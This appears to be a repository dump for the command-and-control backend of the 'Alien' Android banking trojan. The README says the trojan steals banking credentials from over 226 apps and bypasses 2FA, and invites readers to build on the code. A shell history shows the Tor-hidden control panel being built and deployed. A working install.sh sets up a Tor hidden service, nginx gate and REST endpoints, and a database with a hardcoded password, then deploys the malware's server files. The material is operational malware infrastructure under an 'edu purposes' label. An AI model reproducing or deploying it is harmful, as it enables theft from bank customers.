README.md
# source-alien-banking-botnet
 
Alien Banking Botnet is a banking trojan that runs on Android devices. It was first discovered in early 2023 and has quickly become one of the most dangerous banking trojans in the world.

Alien is designed to steal victims' credentials from their banking apps. To do this, it installs a malicious app on the victim's device and then takes screenshots of the banking apps. It then uses these screenshots to obtain the victim's credentials.

Alien is particularly dangerous because it has the ability to bypass two-factor authentication (2FA). 2FA is an additional security layer that requires a user to have a security code in addition to their credentials. Alien can install a TeamViewer app on the victim's device and then use that app to remotely access the device to steal the 2FA code.

Alien targets over 226 banking apps, including:

Bank of America,
Chase,
Wells Fargo,
Citibank,
Capital One,
PayPal,
Venmo,
Google Pay,
Apple Pay

This is an important development for security researchers and experts. The source code can be used to gain a better understanding of how Alien operates. This information can be utilized to develop new methods for detecting and preventing Alien. Additionally, you can use the code as a base to develop your own software.

# Edu purposes.


history.txt
   1  clear
    2  ls
    3  cd ..
    4  ls
    5  lcear
    6  ls
    7  clear
    8  ls
    9  cd panel/
   10  ls
   11  npm i
   12  ls
   13  clear
   14  ls
   15  npm run build
   16  ls
   17  mv build /var/www/tor/
   18  clear
   19  ls
   20  cd /var/www/tor/
   21  ls
   22  rm -rf config.json
   23  rm -rf config.php
   24  cd build/
   25  ls
   26  mv * ..
   27  cd ..
   28  ls
   29  clear
   30  ls
   31  nano /etc/nginx/sites-available/default
   32  qinjgmcdujgass2xvpzbflg2brykuyw6sqd5kerttakz7anqtmsc22ad.onion
   33  FPMVERSION=$(find /run/php/ -name 'php7.*-fpm.sock' | head -n 1)
   34  service tor restart
   35  service nginx restart
   36  service tor status
   37  ls
   38  nano config.
   39  nano config.php
   40  mysql -u root -p
   41  clear
   42  ls
   43  cd /home/
   44  ls
   45  cd V1
   46  ls
   47  cd ..
   48  ls
   49  cd alien/
   50  ls
   51  cd panel/
   52  ls
   53  cd src/
   54  ls
   55  cd ..
   56  ls
   57  cd /home/
   58  ls
   59  cd alien/
   60  ls
   61  cp -r zbab /var/www/tor/
   62  cd /var/www/tor/
   63  ls
   64  clear
   65  ls
   66  chmod -R 777 *
   67  clear
   68  ls
   69  clear
   70  ls
   71  cd home/
   72  ls
   73  cd alien/
   74  ls
   75  cd ..
   76  ls
   77  cd /var/www/tor/
   78  ls
   79  cd /home/
   80  ls
   81  cd alien/
   82  ls
   83  cd panel/
   84  ls
   85  npm run build
   86  npm install util
   87  ls
   88  rm -rf node_modules/
   89  ls
   90  clear
   91  ls
   92  nano in
   93  nano info.txt
   94  ls
   95  cd ..
   96  l
   97  sclear
   98  ls
   99  clear
  100  cd ..
  101  ls
  102  clear
  103  ls
  104  cd cerberus_research
  105  ls
  106  cd cerberus_research
  107  rm -rf cerberus_research
  108  rm -rf cerberus_research-master/
  109  clear
  110  ls
  111  git clone https://github.com/ics-iot-bootcamp/cerberus_research
  112  ls
  113  unzip cerberus_research
  114  cd cerberus_research
  115  ls
  116  cd cerberus_
  117  ls
  118  cd cerberus_full_package/
  119  ls
  120  cd v1
  121  ls
  122  cd V1/
  123  ls
  124  clear
  125  ls
  126  cd ..
  127  ls
  128  mv V1/ /home/
  129  cd /home/
  130  ls
  131  cd v1
  132  cd V1/
  133  ls
  134  cd panel/
  135  ls
  136  npm run build
  137  cd public/
  138  ls
  139  cd ..
  140  ls
  141  clear
  142  ls
  143  ./b
  144  ./build.sh
  145  sudo su
  146  clear
  147  ls
  148  cd alien/
  149  ls
  150  cd panel/
  151  ls
  152  clear
  153  ls
  154  cd src/
  155  ls
  156  cd /home/
  157  mkdir src
  158  clear
  159  l
  160  cd alien/panel/src/
  161  ls
  162  cp -R * /home/src/
  163  ls
  164  clear
  165  cd /home/
  166  ls
  167  cd src/
  168  ls
  169  cd ..
  170  ls
  171  cd src/
  172  ls
  173  cd ..
  174  ls
  175  cd v1
  176  cd V1
  177  ls
  178  cd panel/
  179  ls
  180  cd src/
  181  ls
  182  rm -rf pages/
  183  ls
  184  cd /home/
  185  ls
  186  cd src/
  187  ls
  188  cp -R pages/ /home/V1/panel/src/
  189  ls
  190  cd /home/V1/panel/
  191  ls
  192  clear
  193  ls
  194  cd src/
  195  ls
  196  cd ..
  197  ls
  198  npm run build
  199  cd ..
  200  ls
  201  clear
  202  ls
  203  cd ..
  204  ls
  205  cd src/
  206  ls
  207  cd /home/V1
  208  ls
  209  cd panel/
  210  ls
  211  cd src/
  212  ls
  213  rm -rf *
  214  clear
  215  ls
  216  cd /home/
  217  ls
  218  cd src/
  219  ls
  220  cp -R * /home/V1/panel/src/
  221  cd /home/V1/
  222  ls
  223  cd panel/
  224  ls
  225  npm run build
  226  ls
  227  clear
  228  ls
  229  cd /var/www/tor/
  230  ls
  231  mkdir falanfilan
  232  mv db.php falanfilan/
  233  mv restapi.php falanfilan/
  234  clear
  235  ls
  236  rm -rf asset-manifest.json
  237  ls
  238  rm -rf *
  239  clear
  240  ls
  241  cd /home/V1/
  242  ls
  243  cd panel/
  244  ls
  245  rm -rf build
  246  npm run build
  247  ls
  248  mv build /var/www/tor/
  249  ls
  250  cd /var/www/tor/
  251  ls
  252  cd build/
  253  ls
  254  mv * ..
  255  cd ..
  256  ls
  257  cd ..
  258  ls
  259  cd tor/
  260  ls
  261  clear
  262  ls
  263  nano config.php
  264  clear
  265  ls
  266  a
  267  cd ..
  268  ls
  269  clear
  270  ls
  271  cd /home/
  272  ls
  273  cd V1
  274  ls
  275  clear
  276  ls
  277  cd panel/
  278  ls
  279  cd public/
  280  ls
  281  nano index.html
  282  clear
  283  ls
  284  cd i
  285  cd img/
  286  ls
  287  clear
  288  ls
  289  cd ..
  290  ls
  291  rm -rf img/
  292  clear
  293  ls
  294  wget cnsrd//967902524646510612/img.zip
  295  clear
  296  ls
  297  unzip img.zip
  298  clear
  299  ls
  300  rm -rf img.zip
  301  clear
  302  ls
  303  cd ..
  304  ls
  305  cd public/
  306  ls
  307  nano index.html
  308  clear
  309  ls
  310  cd ..
  311  ls
  312  npm run build
  313  ls
  314  cd /var/www/tor/
  315  ls
  316  rm -rf *
  317  clear
  318  ls
  319  cd /home/V1/
  320  ls
  321  clear
  322  ls
  323  cd panel/
  324  ls
  325  cp -R build /var/www/tor/
  326  ls
  327  cd /var/www/tor/
  328  ls
  329  cd build/
  330  ls
  331  mv * ..
  332  clear
  333  ls
  334  cd ..
  335  ls
  336  rm -rf buil
  337  rm -rf build
  338  clear
  339  ls
  340  rm -rf favicon.ico
  341  cd /home/V1
  342  ls
  343  clear
  344  ls
  345  cd pa
  346  cd panel/
  347  ls
  348  cd public/
  349  ls
  350  rm -rf favicon.ico
  351  clear
  352  ls
  353  cd /var/www/tor/
  354  ls
  355  clear
  356  ls
  357  chmod -R 777 *
  358  ls
  359  nano precache-manifest.1b9e1e71aacf6776a4d7cf7565631dd0.js
  360  ls
  361  cd /var/www/tor/
  362  ls
  363  nano config.php
  364  mysql -u root -p
  365  clear
  366  l
  367  clear
  368  ls
  369  clear
  370  l
  371  cd /home
  372  l
  373  rm -rf
  374  rm -rf *
  375  clear
  376  l
  377  wget https://github.com/ics-iot-bootcamp/cerberus_research.git
  378  wget https://github.com/ics-iot-bootcamp/cerberus_research/archive/refs/heads/master.zip
  379  apt install unzip
  380  unzip master.zip
  381  clear
  382  l

install.sh
#!/bin/bash

# @cerberus
apicryptkey=$(openssl rand -hex 6)
sqlpassword=$(openssl rand -hex 32)

apt update

apt install systemd nginx tor php-fpm mysql-server php php-cli php-xml php-mysql php-curl php-mbstring php-zip unzip -y
apt purge apache2 -y
apt install openjdk-8-jdk

rm -rf /lib/systemd/system/tor.service
read -r -d '' TORCONFIG << EOM
[Unit]
Description=cerberus

[Service]
User=root
Group=root
RemainAfterExit=yes
ExecStart=/usr/bin/tor --RunAsDaemon 0
ExecReload=/bin/killall tor
KillSignal=SIGINT
TimeoutStartSec=300
TimeoutStopSec=60
Restart=on-failure

[Install]
WantedBy=multi-user.target
EOM

echo "$TORCONFIG" > /lib/systemd/system/tor.service

rm -rf /usr/share/tor/tor-service-defaults-torrc
rm -rf /etc/tor/torrc

read -r -d '' ServiceCFG << EOM
HiddenServiceDir /var/lib/tor/cerberus
HiddenServicePort 80 127.0.0.1:8080
EOM

echo "$ServiceCFG" > /etc/tor/torrc


systemctl daemon-reload
systemctl restart tor
sleep 5

FPMVERSION=$(find /run/php/ -name 'php7.*-fpm.sock' | head -n 1)

RESTAPIHOSTNAME=$(cat /var/lib/tor/cerberus/hostname)

read -r -d '' DefaultNGINX << EOM
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        root /var/www/gate;
        index index.php;
        server_name _;

        add_header Access-Control-Allow-Origin "*";

        location ~ \.php\$ {
          try_files \$uri =404;
          include /etc/nginx/fastcgi.conf;
          fastcgi_pass unix:/run/php/php7.4-fpm.sock;
        }

}
server {
        listen 8080 default_server;
        listen [::]:8080 default_server;
        root /var/www/restapi;

        index index.php;

        server_name qinjgmcdujgass2xvpzbflg2brykuyw6sqd5kerttakz7anqtmsc22ad.onion;

        add_header Access-Control-Allow-Origin "*";

        location ~ \.php\$ {
          try_files \$uri =404;
          include /etc/nginx/fastcgi.conf;
          fastcgi_pass unix:/run/php/php7.4-fpm.sock;
        }
}
EOM

echo "$DefaultNGINX" > /etc/nginx/sites-available/default

sed -i 's/keepalive_timeout/client_max_body_size 200M;\nkeepalive_timeout/g' /etc/nginx/nginx.conf

nginx -s reload
systemctl restart nginx
systemctl restart tor

sleep 5

mysql -uroot --password="" -e 'CREATE DATABASE `database`;'
mysql -uroot --password="" -e "CREATE USER 'user'@'localhost' IDENTIFIED BY 'T3VKLKUGo3KuKx5';"
mysql -uroot --password="" -e 'use `database`; source /home/alienv2/nope_1.sql;'
mysql -uroot --password="" -e "GRANT ALL PRIVILEGES ON *.* TO 'user'@'localhost';"
mysql -uroot --password="" -e "FLUSH PRIVILEGES;"

mkdir /var/www/
mkdir /var/www/gate
mkdir /var/www/restapi

#cd /home/
sed -i "s/\.\.key\.\./T3VKLKUGo3KuKx5/g" restapi.php
sed -i "s/\.\.passwd\.\./idksomething/g" restapi.php
cp /home/alienv2/restapi.php /var/www/restapi/index.php

cd /root/
sed -i "s/\.\.key\.\./T3VKLKUGo3KuKx5/g" gate.php
sed -i "s/\.\.passwd\.\./idksomething/g" gate.php
cp /home/alienv2/gate.php /var/www/gate/index.php

cp /home/alienv2/zbab /var/www/loner.cu

chown -R www-data:www-data /var/www

echo ""
echo "-------------------------------"
echo "Installation complete"
echo "domain: $RESTAPIHOSTNAME"
echo "sql user: user"
echo "sql password: $sqlpassword"
echo "api crypt key: $apicryptkey"
echo "please update user."
